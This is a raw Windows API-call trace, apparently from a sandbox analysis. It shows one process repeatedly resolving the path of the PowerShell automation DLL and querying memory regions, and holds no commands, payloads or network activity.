	[0401.478] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.478] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.478] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.478] VirtualQuery (in: lpAddress=0x28b5b0, lpBuffer=0x28c470, dwLength=0x30 | out: lpBuffer=0x28c470*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.478] VirtualQuery (in: lpAddress=0x28b640, lpBuffer=0x28c500, dwLength=0x30 | out: lpBuffer=0x28c500*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.478] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.478] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.478] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.479] VirtualQuery (in: lpAddress=0x28b5b0, lpBuffer=0x28c470, dwLength=0x30 | out: lpBuffer=0x28c470*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.479] VirtualQuery (in: lpAddress=0x28b640, lpBuffer=0x28c500, dwLength=0x30 | out: lpBuffer=0x28c500*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.479] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.479] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.479] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.479] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.479] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.480] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.480] VirtualQuery (in: lpAddress=0x28b5b0, lpBuffer=0x28c470, dwLength=0x30 | out: lpBuffer=0x28c470*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.480] VirtualQuery (in: lpAddress=0x28b640, lpBuffer=0x28c500, dwLength=0x30 | out: lpBuffer=0x28c500*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.480] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.480] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.480] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.480] VirtualQuery (in: lpAddress=0x28b5b0, lpBuffer=0x28c470, dwLength=0x30 | out: lpBuffer=0x28c470*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.481] VirtualQuery (in: lpAddress=0x28b640, lpBuffer=0x28c500, dwLength=0x30 | out: lpBuffer=0x28c500*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.481] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.481] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.481] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.481] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.481] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.481] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.481] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.481] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.481] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.482] VirtualQuery (in: lpAddress=0x28b5b0, lpBuffer=0x28c470, dwLength=0x30 | out: lpBuffer=0x28c470*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.482] VirtualQuery (in: lpAddress=0x28b640, lpBuffer=0x28c500, dwLength=0x30 | out: lpBuffer=0x28c500*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.482] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.482] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.482] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.482] VirtualQuery (in: lpAddress=0x28b5b0, lpBuffer=0x28c470, dwLength=0x30 | out: lpBuffer=0x28c470*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.482] VirtualQuery (in: lpAddress=0x28b640, lpBuffer=0x28c500, dwLength=0x30 | out: lpBuffer=0x28c500*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.483] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.483] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.483] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.483] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28ca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.483] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.483] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.483] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.483] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.483] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.484] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.484] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.484] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.484] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.484] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.484] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.484] VirtualQuery (in: lpAddress=0x28c050, lpBuffer=0x28cf10, dwLength=0x30 | out: lpBuffer=0x28cf10*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0401.485] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.485] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.485] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.485] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.485] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.485] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.485] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.485] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.485] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.486] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.486] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.486] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.486] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.486] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.486] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28c210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0401.486] VirtualQuery (in: lpAddress=0x28c050, lpBuffer=0x28cf10, dwLength=0x30 | out: lpBuffer=0x28cf10*(BaseAddress=0x28c000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
